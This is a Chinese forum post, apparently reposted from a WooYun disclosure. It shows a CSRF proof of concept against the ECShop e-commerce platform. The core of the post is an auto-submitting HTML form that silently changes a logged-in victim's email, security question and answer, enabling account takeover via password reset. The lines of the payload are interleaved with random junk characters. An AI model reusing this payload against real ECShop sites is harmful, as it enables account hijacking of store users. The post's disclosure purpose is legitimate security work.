找回密码
 立即注册
查看: 2493|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:0 i( D2 I0 |/ Z7 Q# c1 @
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
6 a$ {+ r3 i( O' T( q  ?
. i8 D, ?2 U3 T3 K8 uDemo For:http://www.wooyun.org/bug.php?action=view&id=395
$ R7 F/ Q: H4 B0 g* l2 W, m7 m5 s6 N
详细说明:
1 \4 f1 v) ^& [! Y* H- r, T利用csrf和xss可以突破官方所说的“障碍”
( v2 q; X" G; g* W& p6 s' ]xss版本已经有人说明, t- o4 t" ~" b. z' A* U0 w' d
这里给出csrf版本
. \$ W% ]  _* O0 V$ F* E" }; ^5 E7 S% P
漏洞证明:$ U3 g- P/ Q' @1 o! B/ K3 Z
<html>1 {! ?2 ]( k7 X; ^4 F1 W
<body># s6 g. x# m/ S; `: d0 k
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">0 B9 i' Y# H8 T9 M
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">6 V( M% _- c, Z& j( R
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
) |8 q, Y8 m& Y<INPUT TYPE="text" NAME="sel_question" value="ecshop"># u. e/ ~" b3 ~# C* y
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">0 S! ~1 ]# T+ p& u0 x% E
</body>
" n( r  ~* N# a* `! M) c" M<script>. ~1 V1 A0 x# _' c$ i
document.forms[0].submit();
% q( J9 R( a  O7 c; l# ^</script>! W# z, N! v- P8 c8 U) }
</html>0 P- z8 i7 v) |! z; K
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
* g( w& h  ]0 ]% W! A4 W- ^. d5 k  U$ U3 d  j1 u( {' l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表